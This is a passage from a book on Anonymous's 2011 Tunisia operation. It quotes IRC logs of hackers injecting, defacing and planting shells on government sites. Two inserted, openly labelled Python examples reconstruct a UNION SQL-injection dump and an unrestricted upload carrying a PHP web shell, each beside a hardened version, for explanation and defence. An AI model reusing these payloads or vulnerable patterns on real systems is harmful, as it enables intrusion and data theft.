
Hacker, Hoaxer, Whistleblower, Spy


by Gabriella Coleman


  Anonymous, in turn, has launched DDoS attacks against the websites of the Tunisian prime minister and his corrupt government, the stock market, and the primary DNS server of Tunisia—thus successfully bringing down many of the websites ending in .tn. Additionally, we have taken steps to ensure that Tunisians can connect anonymously to the internet, and access information that their government does not want them to see.

  There has been an almost complete absence of prominent coverage. We ask, why is a news source like AlJazeera one of the few covering these earth shaking riots while the rest remain quiet? The world is getting the impression that unless western economic interests are involved, our media does not care to report upon it.

  Perhaps you didn’t know? Now that you do, you can help us spread the news. After all, you do not have to wear a mask to do it.

  Sincerely,

  Anonymous12

  “Dudes believe me the key of this is having no ego”

  But Anonymous was doing more than pestering the mainstream media to do its job. By January 2, 2011, a technical team on #internetfeds forsook their holidays to work nonstop. Indeed, Adnon told me he barely slept for two weeks. In an interview, he explained that the operation took a different approach than Operation Payback and Avenge Assange:

  : With Tunisia we had a plan

  : We thought carefully about what to do and when in a small group

  : presented a list of options in a poll

  : then took the result of the poll

  : It was much less a big group decision than other ops

  OpTunisia marked, both internally and externally, a sea change. All throughout the fall, multiple secret cabals and channels had populated Anonymous. Even Chanology had to reckon with marblecake, a cabal of its very own. While those in secret channels wielded technical power, and in many respects called the shots, they were still beholden to those in the public channel if they wanted to get things done. The angry masses of the IRC body politic kept the cabals in check—a message made clear when, earlier in the fall, the masses rose up in a collective shitstorm at #command’s attempts to cease DDoSing in response to the Pirate Party.

  The managing of OpTunisia was different: from the beginning, a handful of smaller teams composed of hackers, propaganda makers, and organizers led the operation and never let go. It was not that this team-based model displaced other mass modalities of organizing. There were other, simultaneous operations—some of which originated from the public channels with no cabal involvement. And a public IRC channel attached to OpTunisia existed, and played a valuable role.

  On January 2, 2011, a hacker named “rubik” (not his real pseudonym), who had been working on two private channels, swooped in to announce that a Tunisian website had been defaced (all pseudonyms have been changed):

  : http://www.pm.gov.tn/pm/index.php—defaced

  : way to go anons!!!!!

  : wayy to fucking go!

  : Fucking A! Nice Job

  : More to come biotches :P

  : http://www.marchespublics.gov.tn/ also.

  : http://www.pm.gov.tn and http://www.marchespublics.gov.tn/ DE-FUCKING-FACED!

  : btw mad props on the lolcats: http://www.pm.gov.tn/pm/index.php

  : http://www.pm.gov.tn/pm/index.php

  BOOYA MOTHERFUCKERS

  A group of hackers had been hard at work, cooperating as a team, for some time. Yet the majority of journalists couldn’t resist the opportunity to pinpoint a “mastermind” or “leader,” the architect ostensibly maneuvering everyone else. Ironically, an Internet search for “Anonymous leader” will yield at least four different names. Eventually, most journalists identified Sabu and Topiary as the leaders, most likely because they erroneously conflated their robust public relations presence with organizational (or dictatorial) control.13

  Although many articles single out a “ringleader” or a “mastermind,” the exact nature of what this entails is left largely unstated. The reader is left to use his or her own imagination—perhaps envisioning an elite villain sitting on a high-backed chair in some ice palace, stroking a cat on his lap as a deep echoing laugh reverberates slowly through the chambers. Adrian Chen surmised, based on leaked IRC logs, that “Sabu plays the role of a leader, enforcing unit discipline while the other members stand by.”14 And yet Chen himself belies this insight in the next breath by shifting attention to a related hack performed without Sabu’s input by another group of Anons. Analyzing a single log for evidence of a leader is about as effective as extrapolating the entire plot of a movie from a single still frame. Yet the Guardian’s Charles Arthur made the same error, writing, “For some time after the UK arrests, the only visibly active member of LulzSec remained its leader, known online as Sabu, who would simultaneously deny that he was its leader and then use phrases such as ‘my team.’”15 But broader context reveals that Sabu was simply referring to the #pure-elite channel he created long ago, described by other LulzSec members as an IRC channel where “friends of LulzSec” could hang out.

  As it turns out, hacker undertakings, especially within Anonymous, tend to be dynamic and fluid, with multiple individuals or even groups working in concert. What holds true for one operation may not for the next. Sometimes a particularly obsessive hacker engenders, for a time, an organized collective workflow. At other times, it is chaos and miscommunication. Indeed, when I interviewed Jeremy Hammond in prison much later, he bemoaned, “I wish we were more like RedHack, more disciplined.” RedHack, a Turkey-based hacktivist group, has a clear hierarchy, a leader, and a spokesperson—products, each, of sixteen years of organizing and a shared devotion to Marxist-Leninist tactics.

  Maybe Anonymous could have achieved more had it had a leader or a static hierarchy. Hackers tend to suffer from what I like to call Geek Distraction Disorder (GDD). Without oversight, a hacker could easily wind up in a field, surrounded by yaks, with a shaving razor in hand, wondering how he got there (if you understand this reference, you are at risk!). But it is equally probable that Anonymous achieved so much precisely because there was no boss pointing to a fixed destination. Whatever the case, the work unfurled organically: depending on who was on the channel, what each participant could contribute, and their willingness, in a certain moment, to learn something new—the crucial ingredient of most any successful hack.

  OpTunisia illustrates this all so well. Imagine yourself on IRC, an Anon witnessing the operation’s beginning. It is January 2, 2011, and you are working directly with Tunisian activists and hackers who are feeding you unvarnished information about a historic revolt. You are at home, sitting largely still except for your fingers moving at the keyboard, but the information you receive enables responses that can make a direct difference in the event, just one step removed from the people on the ground throwing Molotov cocktails. Your contributions won’t necessarily be significant, but they can’t be overlooked. They are personally empowering, a mechanism of solidarity, and, in some cases, perhaps even a real boon that shields those on the ground from harm. All of this depends on shifting, messy modes of cooperation—and sets the stage for organizations to spring up around a particularly good idea, and to fall apart at even a hint of disagreement and alternate paths.

  At this time there were two different and private IRC channels that were active simultaneously, #opdeface and #internetfeds. The latter is where the heavy technical lifting was done, the former where organizers congregated. A gopher shuttled news between them. Some hackers were in the know, while others were continually arriving (all pseudonyms have been changed):

  : K-rad, Any good with PostgreSQL? [PostgreSQL is a database]

  : http://www.pm.gov.tn/pm/banniere/redirectb.php?id=54&idb=3’2&

  : rubik, i’ve never messed with PostgreSQL, it is even the first time i’ve ever seen it on a box tbh

  : why are we hitting up tunisia?

  : Because they’ve just passed a law which says the media can’t say what they want

  : and banned them from mentioning wikileaks

  : K-rad, thank you!

  : time to own tunisia then ;)

  On other channels, users suggested DDoS campaigns, but both in Anonymous and out, there were those who prided themselves on being “real” hackers and dismissed DDoS as lame (or even detrimental to real hacks, as we will see in a moment). Real hackers find exploits. People who just run LOIC are considered beneath the “hacker” moniker, mere “script kiddies,” or “skiddies” for short. gibnut announces that he has a “zero-day,” which is much more powerful. A zero-day exploit, or “oh day” as people sometimes jokingly call it, targets a previously unknown security vulnerability in a piece of software. It is called a zero-day because the software’s authors, the people who could fix it, have known about it for zero days: there is no patch, so anyone who knows the zero-day can exploit it over and over until one ships. The most coveted zero-days provide access to a computer or network, which is why they are sold for high profit in a thriving black market. Many, many governments participate in this ethically problematic market, including the US government, which, according to technology reporter Joseph Menn, “has become the biggest buyer in a burgeoning gray market where hackers and security firms sell tools for breaking into computers.”16 The US government largely purchases zero-days from private firms that “spend at least tens of millions of dollars a year just on exploits.”17 Suffice it to say, gibnut’s news was received with excitement:

  : lets see fuck loic, we’ll hurt them a different way

  : oh yes please

  : I have 0day local root exploit against openwebmail and Tunisia’s NIC servers run it

  : https://risala.ati.tn/cgi-bin/openwebmail/openwebmail.pl

  : if we can get into that server we can root tunisias .tn tld nameservers and control its entire internet space

  : oshit

  : redirect it all to wikileaks ;)

  : shit just got real due to gibnut

  With this zero-day, gibnut is suggesting that they can compromise the servers of Tunisia’s network information center (the NIC, which operates the registry for the country’s domain names) and thereby control the entire Tunisian top-level domain (TLD) name space. An example of a TLD is .com or .org. Each country has its own TLD; Tunisia’s is “.tn.” If the Anons can take over the nameservers that answer for .tn, they can make any name ending in .tn resolve to any server they wish. gibnut lulzily suggests WikiLeaks. One caveat, which the channel itself notes a moment later: a local root exploit escalates privileges from an account the attacker already has on the machine, so the team still needed a separate way onto the server first (“but first we need to find a bug on there”). Although this particular exploit did not yield access (for unknown reasons), it did succeed in spreading an anxious optimism throughout the sidelines:18

  : let me see if I can get in… brb [be right back]

  : Arm the nuclear warheads guys.

  : Internetfeds is going in.

  : gibnut, :D nice <3

  : but first we need to find a bug on there

  : epic

  : for some reason stuff in this channel always ends up being epic

  : lol

  : ah guess i’m going to have to use some postgresql injection cheat sheet or something

  : rubik, or, download havij for windows

  : http://www.marchespublics.gov.tn IS HIGHLY INJECTABLE :3 [there is at least one vulnerability that lets an attacker pass their own SQL to the site’s database, reading or modifying it in ways other than intended]

  : stand by for lulz <3

  : :o

  : looks like ministry of justice, i think, idk [I dont know]

  : i don’t know but ALOT of the sites are vuln [vulnerable]!

  Like many hackers, if they don’t know something, they go teach themselves:

  : know tht postgres bug?

  : yeah

  : i did some reading on posgres and lurned me some DB [database] so now i know how to inject it :D

  : stand by for dump

  K-rad went away for a while, clearly working hard, then came back with some results. K-rad accessed a database with sixteen hundred rows (and thus entries) and tried to crack the passwords. First apologizing—“sry guys jst taking time because i’ve never done postgres SQL and im trying to write it in to a script to make it faster as i do it”—he then realized that the ongoing DDoS was what was causing the slowdown of the password dump. He implored:

  : Someone tell optunisia DO NOT DDOS 193.95.68.156 it’s fucking up my dump
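  What K-rad and rubik are doing with the `id=54&idb=3'2&` probe and the later “dump” is shown below as an added example; it is not code from the book or from anyone on the channel. It uses Python’s built-in sqlite3 in place of the PostgreSQL server the Tunisian site ran, so it runs offline, and the table names, rows and password hashes are constructed for the demonstration. The vulnerable query pastes request parameters into the SQL text; the hardened one validates them and binds them as parameters.

```python
import sqlite3

# Constructed stand-in for the site's database: the banner table that the
# redirect page legitimately queries, plus a user table an attacker would want.
# The hashes are unsalted MD5 of "password" and "123456", the sort of thing
# K-rad's "trying to crack the passwords" refers to.
SCHEMA = """
CREATE TABLE banniere (id INTEGER, idb INTEGER, url TEXT);
INSERT INTO banniere VALUES (54, 3, 'http://example.invalid/banner3');
CREATE TABLE utilisateurs (login TEXT, password TEXT);
INSERT INTO utilisateurs VALUES ('admin', '5f4dcc3b5aa765d61d8327deb882cf99');
INSERT INTO utilisateurs VALUES ('webmaster', 'e10adc3949ba59abbe56e057f20f883e');
"""


def build_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def redirect_vulnerable(conn, id_param: str, idb_param: str) -> list:
    """The bug: request parameters pasted straight into the SQL text,
    as redirectb.php?id=54&idb=3 evidently did (assumed, not the site's code)."""
    sql = f"SELECT url FROM banniere WHERE id = {id_param} AND idb = {idb_param}"
    return [row[0] for row in conn.execute(sql)]


def redirect_safe(conn, id_param: str, idb_param: str) -> list:
    """Hardened form: validate the type, then bind the values as parameters
    so the database never interprets them as SQL."""
    if not (id_param.isdigit() and idb_param.isdigit()):
        raise ValueError("id and idb must be integers")
    sql = "SELECT url FROM banniere WHERE id = ? AND idb = ?"
    return [row[0] for row in conn.execute(sql, (int(id_param), int(idb_param)))]


def probe(conn, idb_param: str) -> str:
    """What the idb=3'2 probe tells an attacker: a database error means the
    stray quote reached the SQL parser, so the parameter is injectable."""
    try:
        redirect_vulnerable(conn, "54", idb_param)
    except sqlite3.OperationalError:
        return "syntax error: injectable"
    return "no error"


def dump_users(conn) -> list:
    """UNION-based dump through the same parameter: the payload completes the
    legitimate WHERE clause and appends a SELECT of the attacker's choosing."""
    payload = "3 UNION ALL SELECT login || ':' || password FROM utilisateurs"
    return redirect_vulnerable(conn, "54", payload)


def safe_rejects(conn, payload: str) -> bool:
    """True when the hardened handler refuses an injection payload outright."""
    try:
        redirect_safe(conn, "54", payload)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = build_db()
    print(probe(db, "3"), "|", probe(db, "3'2"))
    print(dump_users(db))
    print(safe_rejects(db, "3 UNION ALL SELECT login FROM utilisateurs"))
```

  The error on the quoted probe is the tell; from there a UNION appends the attacker’s own SELECT to the legitimate one, which is what “stand by for dump” refers to, and looping that over every table is the script K-rad was writing “to make it faster.” With parameter binding the quote is data, not SQL, and the type check turns the payload away before the database sees it.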

  As this was a team effort, other hackers were simultaneously trying to gain access through other potential security vulnerabilities. They realized that if they could get shell access, which gives command-line access to the underlying operating system rather than just to the web application, they could potentially get the private emails of the prime minister of Tunisia, and then leak them. rubik managed to gain access but, unfortunately, found nothing but spam—but that didn’t stop the “owning” process. To “own,” “0wn,” or “pwn” a server basically means that you have gained the top level of privileged access and, from there on out, you have free rein to do whatever you like with it. You can read any file, write to any file, change running processes, inject your own processes/malicious code, or, if you are so inclined, delete everything. You are “root,” the full administrator of the machine, even though you are nowhere physically near the machine itself. Inevitably, of course, the Anons defaced the site, but first they attempted to score some emails:

  : I logged it but there’s nothing there

  : brb guys im going to make a fresh tea :3

  : http://www.marchespublics.gov.tn/onmp/upload/upload_fichier.php?Field=document&type=document

  : ;]

  : shall I own it now or later

  : nice

  : be best now while the anti-tuni.gov steam is still rolling

  : we could upload a shell i suppose

  : tre

  : which shells would you guys like ;]

  : i have like 40

  : it will maximize effect and morale

  : if we can root it, we need to go for email leak too!

  : not just deface!

  : :D

  : full on email leak :D:D

  : found the shell

  : www.marchespublics.gov.tn/onmp/upload/documents

  : someone make a fancy payback deface page plz :3
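  The upload bug the channel is using here, a handler that stores whatever it receives under the client’s filename in a directory the web server will execute, is reconstructed below as an added example beside a hardened handler. This is neither the Tunisian site’s code nor the Anons’ shell; the paths, the allowlist, the sample PHP shell and the sample PDF are all constructed for the demonstration.

```python
import os
import secrets
import tempfile

# Constructed allowlist: permitted extension -> leading bytes the file must carry
ALLOWED = {".pdf": b"%PDF-", ".png": b"\x89PNG\r\n\x1a\n"}
MAX_BYTES = 5 * 1024 * 1024


def upload_vulnerable(webroot: str, client_name: str, data: bytes) -> str:
    """The bug as the chat describes it: client-chosen name, no content check,
    written under the web root where the server runs .php files."""
    dest_dir = os.path.join(webroot, "onmp", "upload", "documents")
    os.makedirs(dest_dir, exist_ok=True)
    dest = os.path.join(dest_dir, client_name)  # "shell.php" stays "shell.php"
    with open(dest, "wb") as f:
        f.write(data)
    return dest


def upload_hardened(storage_root: str, client_name: str, data: bytes) -> str:
    """Allowlisted extension, magic bytes matching that extension, a random
    server-side name, and storage outside the web root so that even a file
    that slips through is never executed, only served back as data."""
    if len(data) > MAX_BYTES:
        raise ValueError("file too large")
    ext = os.path.splitext(os.path.basename(client_name))[1].lower()
    if ext not in ALLOWED:
        raise ValueError(f"extension {ext!r} not allowed")
    if not data.startswith(ALLOWED[ext]):
        raise ValueError("content does not match declared type")
    dest = os.path.join(storage_root, secrets.token_hex(16) + ext)
    with open(dest, "wb") as f:
        f.write(data)
    return dest


def hardened_rejects(storage_root: str, client_name: str, data: bytes) -> bool:
    """True when the hardened handler refuses the upload."""
    try:
        upload_hardened(storage_root, client_name, data)
    except ValueError:
        return True
    return False


def demo() -> dict:
    """Runs both handlers on a constructed PHP web shell and a constructed PDF."""
    shell = b"<?php system($_GET['cmd']); ?>\n"  # the kind of "shell" rubik had 40 of
    pdf = b"%PDF-1.4\n% constructed sample document\n"
    with tempfile.TemporaryDirectory() as webroot, tempfile.TemporaryDirectory() as store:
        vuln_path = upload_vulnerable(webroot, "shell.php", shell)
        ok_path = upload_hardened(store, "report.pdf", pdf)
        return {
            # the shell lands at onmp/upload/documents/shell.php, where it was later "found"
            "vulnerable_stores_php": os.path.basename(vuln_path) == "shell.php"
            and os.path.basename(os.path.dirname(vuln_path)) == "documents",
            "hardened_rejects_php": hardened_rejects(store, "shell.php", shell),
            # renaming the shell to .pdf fails the magic-byte check
            "hardened_rejects_renamed_shell": hardened_rejects(store, "shell.pdf", shell),
            # double extensions: .pdf.php fails the allowlist, .php.pdf fails the content check
            "hardened_rejects_double_ext": hardened_rejects(store, "shell.pdf.php", shell)
            and hardened_rejects(store, "shell.php.pdf", shell),
            # a real-looking PDF is accepted, renamed, and kept out of the web root
            "hardened_accepts_pdf": os.path.dirname(ok_path) == store
            and not ok_path.endswith("report.pdf"),
        }


if __name__ == "__main__":
    for check, passed in demo().items():
        print(f"{check}: {passed}")
```

  The name checks and magic bytes raise the bar, but the defense that actually matters is the last one: an upload directory the interpreter will never run from, and a server-generated name nobody can guess, so that “found the shell” at a predictable path stops being possible.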

  As the team prepared to deface the page, K-rad excitedly declared that there was an old kernel installed. The kernel is the core component of an operating system—the contact point between the hardware and the software. An old kernel usually means there are known, often publicly available, exploits for escalating to root on it, so this is almost always a good sign for someone who already has a foothold and wants full control of the machine:

  : here’s a deface page

  : http://pickhost.eu/images/0004/1986/anonymousdefacetunisia.jpg

  : if u like it

  : :p

  : OOOOOOOOOOOOOOOOOOOOOOOOOOOOOO OOOOOOOOOOOOOOOOOOOOOOOOOLD KERN FTW [For The Win]

  : root?

  : Not bad rubik

  : Any chance you could centre the text at the bottom though?

  : idk i didn’t make it

  : im running on tor

  : wish i hd a vpn

  duckie had just logged in to help. He was eventually booted for lacking sufficient low-level hacking ability, but he was a skilled organizer and broker, so for the time being he was allowed into the channel. He had a rare knack for naming operations and a rare level of insight into the ongoing changes affecting AnonOps:

  : Anything I can do to help which doesn’t involve actually going into the server?

  : rubik, I’ve been in and out, this channel was presumed dead for a long time

  : duckie make a deface page! :D?

  While #internetfeds was in hot pursuit of the private emails of the Tunisian prime minister, there was another channel, #opdeface, also hard at work. But even in the elite channel that was #internetfeds, many were blind to the existence of #opdeface. Meanwhile, the search for emails came up empty. On #opdeface, rubik gave a technical rundown of the exploit they had found on #internetfeds.

  Some Tunisian Anons realized an exploit could work on another target:

  : I repeat: Main target is ati [Tunisian Internet Agency]

  : Direct responsible for censorship

  : i have found an XSS exploit on ati site

  : OT, lol, i just thought you said that in opchannel [a public channel]

  : lol

  : not that stoned yet

  […]

  : we found admin login passwords for publicmarches.gov.tn, which is on the same box as pm.gov.tn now

  : i think we looked into ministry of communication as DDoS target

  : if it was disqualified, i don’t remember why

  : just looking at it

  rubik, thinking they might eventually score some juicy emails, asked them for some help:

  : btw

  : can anyone prepare a statement

  : for the torrent description

  : when we get pm.gov.tn emails

  : i.e. a message to pm.gov.tn about their leaked emails

  : but not yet

  : prepare a deface page

  : unless u like http://pickhost.eu/images/0004/1986/anonymousdefacetunisia.jpg

  : and prepare a torrent description or manifesto

  Eventually, #opdeface delivered:

 
